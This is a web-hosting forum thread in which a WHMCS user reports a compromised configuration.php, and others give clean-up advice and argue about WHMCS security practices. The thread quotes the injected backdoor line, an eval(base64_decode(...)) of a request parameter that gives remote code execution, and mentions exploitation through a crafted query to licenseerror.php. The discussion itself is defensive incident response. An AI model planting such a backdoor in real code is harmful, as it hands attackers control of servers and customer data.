Was my installation compromised?

[Morty]

Hi,

 

Was wondering if I could get a few opinions of what else I should do to enhance security, as well as any checks I can do to understand the degree to which my installation was potentially compromised.

 

I woke this morning to find email from customer saying my site was down with this error:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/hilexcom/public_html/billing/configuration.php on line 2

 

So I check, and sure enough, can't access client site or WHMCS admin either.

 

Line 2 of my Configuration.php file contained this:

$license = "1';eval(base64_decode($_REQUEST['c']));#";

 

instead of:

$license="Owned-99999999999999999999";

 

I'm back up and running again after replacing line2 with my correct license.

I've checked the logs, and there doesn't seem to be any admin access other than from my own IP.

Anything else I should check?

 

I will also be upgrading to the latest version of WHMCS. Anything else recommended?

Comments appreciated.

[ufshane]

Check your downloads folder for any rouge php scripts

[Morty]

Thanks Shane, Good idea, didn't think of that.

Just checked and nothing in the downloads, also I got the following warning:

Permissions Warning!

The downloads folder is not writable by WHMCS so you cannot upload files

 

I'm going to leave it that way....

[slim]

I would be checking your entire site for rouge scripts. Start with WHMCS - every folder, every file.. Use WinMerge to compare the stock release with the files on your server. It will easily show you modified files and new files.

 

Do the same with any other installs you have on your site - wordpress, or whatever you use for your main site etc.

[BryanB]

I have a lot invested in WHMCS and would like for things to work out but my team has been discussing not being able to use WHMCS anymore because of the downward trend in the product quality.

 

The recent security vulnerabilities that were discovered were the result of incredibly amateur coding mistakes. 2 vulnerabilities were discovered 2 days apart. It's great that they were patched relatively quickly, but unfortunately the vulnerability was already public and still leaves us vulnerable and gives us a lot of work to have to keep patching.

 

Flaws happen in software but it is getting too frequent and the vulnerabilities are pretty basic issues that 1. shouldn't have been implemented into the code in the first place and 2. should have been audited.

 

Why are there no audits of the WHMCS software and what is being done to prevent this in the future? There's a lot of outrage in the web hosting community and it seems that someone should at least come forward and say what is being done to better the security of WHMCS. All we've gotten so far is patches and really impersonal blog posts from Mat that don't allow comments so no discussion can be had.

[Chrisw]

You WHMCS installation was exploited. A simple understanding of what the code in the license variable is enough to prove this. Patch your WHMCS and edit the $license line to $license = 'yourlicesekey'; You would want to reset all sensitive data in your database (all passwords, remote access hashes, client passwords). Basically you were exploited by vulnerabilities in WHMCS and the code you mentioned is/was being used as a backdoor for further access.

[zoilodiaz]

I have a lot invested in WHMCS and would like for things to work out but my team has been discussing not being able to use WHMCS anymore because of the downward trend in the product quality.

 

The recent security vulnerabilities that were discovered were the result of incredibly amateur coding mistakes. 2 vulnerabilities were discovered 2 days apart. It's great that they were patched relatively quickly, but unfortunately the vulnerability was already public and still leaves us vulnerable and gives us a lot of work to have to keep patching.

 

Flaws happen in software but it is getting too frequent and the vulnerabilities are pretty basic issues that 1. shouldn't have been implemented into the code in the first place and 2. should have been audited.

 

Why are there no audits of the WHMCS software and what is being done to prevent this in the future? There's a lot of outrage in the web hosting community and it seems that someone should at least come forward and say what is being done to better the security of WHMCS. All we've gotten so far is patches and really impersonal blog posts from Mat that don't allow comments so no discussion can be had.

 

Hi,

 

i agree 100% with you.

[anythinggoes]

Why are there no audits of the WHMCS software and what is being done to prevent this in the future?

 

This seems to be a very common question since SolusVM's public announcement of having one done. However it seems to never come with the question, "has WHMCS performed an audit in the past, and if so, what was the result of it?". Not every company publicizes if it performs a security audit ever, or on a regular basis.

 

It also seems that there's a standard of assuming there shouldn't be an issue in software, ever. Yes, there were a few exploits identified in a short time frame, however that seems to be the only driving force in this. Not the fact that WHMCS was extremely proactive and got an update out - all three times in the recent months while they weren't even at work (from the reports I've seen).

 

While it's unfortunate, yes these issues were discovered by external sources but it appears people think that's the only way they're discovered. Look at the past 6 month history at how proactive they've been working internally and with external vendors:

 

ex:

http://blog.whmcs.com/security.php?t=73290

"The regression was identified internally and is not a candidate for public disclosure."

 

Let's take a look at Oracle, a billion dollar company and the laundry list of exploits they've had:

http://www.red-database-security.com/exploits/oracle_exploits.html

 

Let's take a look at PayPal, "Showing 1 - 25 of 59":

http://packetstormsecurity.com/search/?q=paypal

 

When WHMCS had two within two days, everyone cried for a security audit (likely without even knowing what happens during a security audit).

When WHMCS went a year without a security issue, everyone gripped about something else.

When they do x, everyone says where's the bandwagon?

 

How about a, thanks for providing an extremely inexpensive software for the functionality that allows me to run my business, and getting after these issues so promptly. It's unfortunate that it occurred, and I hope it improves, but I really appreciate the urgency.

[othellotech]

Basically you were exploited by vulnerabilities in WHMCS and the code you mentioned is/was being used as a backdoor for further access.

The edits to configuration.php are done by someone with FTP/File/SSH access to the server, not by 'vulnerabilities in WHMCS'

[hostEONS]

The edits to configuration.php are done by someone with FTP/File/SSH access to the server, not by 'vulnerabilities in WHMCS'

 

I'm not sure what kind of access that exploit gives, but i think if one exploits whmcs that person can further upload other exploits and/or even some php based shells which might be able to edit the config files

 

Just a guess

[bear]

The edits to configuration.php are done by someone with FTP/File/SSH access to the server, not by 'vulnerabilities in WHMCS'

If they had FTP/file/SSH access, why would they edit the config file and reveal themselves?

From what i understand about the recently revealed exploits (currently patched), it's not FTP/File/SSH, it's changed through a submitted string through WHMCS that grants elevated access.

[ebmocwen]

I'd recommend looking through your apache access logs for all pages access requests to "configuration.php", also you may find the value passed to 'c' will be present as a "POST" to this file. This might provide further clues as to what may have been executed as PHP through this file.

[ramystyle]

I gotta agree with anythinggoes !

Bravo to whmcs staff for releasing the patches so quickly and keeping whmcs the number 1 billing software in my opinion.

Their support is great the community it created is unique!

[bugster]

Hello,

I curious if anyone else has been hacked while running 5.2.10. I was yesterday but the hack started before I upgraded so I'm not sure if it is a hole in 5.2.10 or 5.2.8.

One of the files that were uploaded did happen after the upgrade so I'm thinking 5.2.10 still has a security hole in it. Something is allowing hackers to upload files to the download folder.

[WHMCS Chris]

Can you submit a ticket with us? Please title it attn: Chris

 

http://whmcs.com/get-support

[bear]

the hack started before I upgraded so I'm not sure if it is a hole in 5.2.10 or 5.2.8.

...

One of the files that were uploaded did happen after the upgrade

Is it possible that the files uploaded while you were on the older version and hacked allowed them to upload more? An alternate would be if they had gained an admin password during the first part and you hadn't changed it after.

[BryanB]

Whats really concerning is the coding practices that lead to these exploits. As I understand it, they were really basic things that a beginner programmer should know and they also recreated a function that was removed from PHP because it was a security threat.

[kbdavis07]

The edits to configuration.php are done by someone with FTP/File/SSH access to the server, not by 'vulnerabilities in WHMCS'

 

Hi othellotech,

 

I had confirmed myself that the current hacks going on with the configuration.php file is by fact done with a special crafted

URL query on the licenseerror.php webpage.

 

Looking at my server log I caught this.

 

All you do is copy and paste that URL string in your WHMCS website and it adds a new license.

 

It can also change your admin password.

 

I fixed my system and then for kicks run the same query string and it did it again.

 

But this time it change my admin password which at first the hacker did not do.

 

 

So you need to change the /admin folder and password protect it

 

 

The hacker some how was able to do this with out showing up on the WHMCS admin logs but did find it on the server logs through.

 

 

When I done this it show up in admin logs in WHMCS.

[bugster]

I guess it is possible that they had already uploaded files that allowed them to upload more. There was a script called sec.php uploaded right before the update and then sql.php was upload after the update. I changed my admin username and password when I did the update so I don't think they had that.

 

Still hoping to hear back from whmcs, so far I've received a canned response about cleaning up after being compromised but nothing about if they know about security flaws in the current version.

[bear]

Have you looked in those files to see what they were capable of doing? If you still have copies that would be worth investigating. Just don't post the scripts here.

[Blueberry3.14]

Not every company publicizes if it performs a security audit ever, or on a regular basis.

 

It also seems that there's a standard of assuming there shouldn't be an issue in software, ever. Yes, there were a few exploits identified in a short time frame, however that seems to be the only driving force in this. Not the fact that WHMCS was extremely proactive and got an update out - all three times in the recent months while they weren't even at work (from the reports I've seen).

[...]

How about a, thanks for providing an extremely inexpensive software for the functionality that allows me to run my business, and getting after these issues so promptly. It's unfortunate that it occurred, and I hope it improves, but I really appreciate the urgency.

 

I agree, exploits are always going to be found, and what (mostly) matters is the expediency with which they are corrected. Sadly Oracle is an excellent example of how NOT to do patching. Though I say "mostly", because...

 

Whats really concerning is the coding practices that lead to these exploits. As I understand it, they were really basic things that a beginner programmer should know and they also recreated a function that was removed from PHP because it was a security threat.

 

BryanB does have a valid point. Some of the biggest companies and strongest software in the world has been hacked/exploited, but when it's the result of a very basic, n00b-type error, that puts a different spin on things.

 

I truly appreciate the prompt response the WHMCS team made in addressing the last couple of security issues, but I'm considering the recent (last couple of years) history, and choices made by WHMCS that have affected security and usability. It could be normal growing pains... or it could be incompetence. Time will tell which.

[crspyjohn]

There is another WHMCS exploit... when will we receive a patch for it? Can you fix the software already!?

[bugster]

I submitted my logs and the scripts to whmcs. Haven't heard back from them yet but I see someone else posted that there is another exploit for whmcs, no details

[zoilodiaz]

There is another WHMCS exploit... when will we receive a patch for it? Can you fix the software already!?

 

where do you see that? can you provide more information?

 

i already found http://www.webhostingtalk.com/showthread.php?p=8888911#post8888911

Edited October 25, 2013 by zoilodiaz

[Rifayat Ahmed]

There is currently a new exploit out publicly for version 5.2.10, so it would be best to take your WHMCS system offline until the WHMCS team comes up with a security patch. According to the exploit publisher, this is only the first part of the exploit and there's more to follow, unless the WHMCS team can figure out what it is and plug the security hole.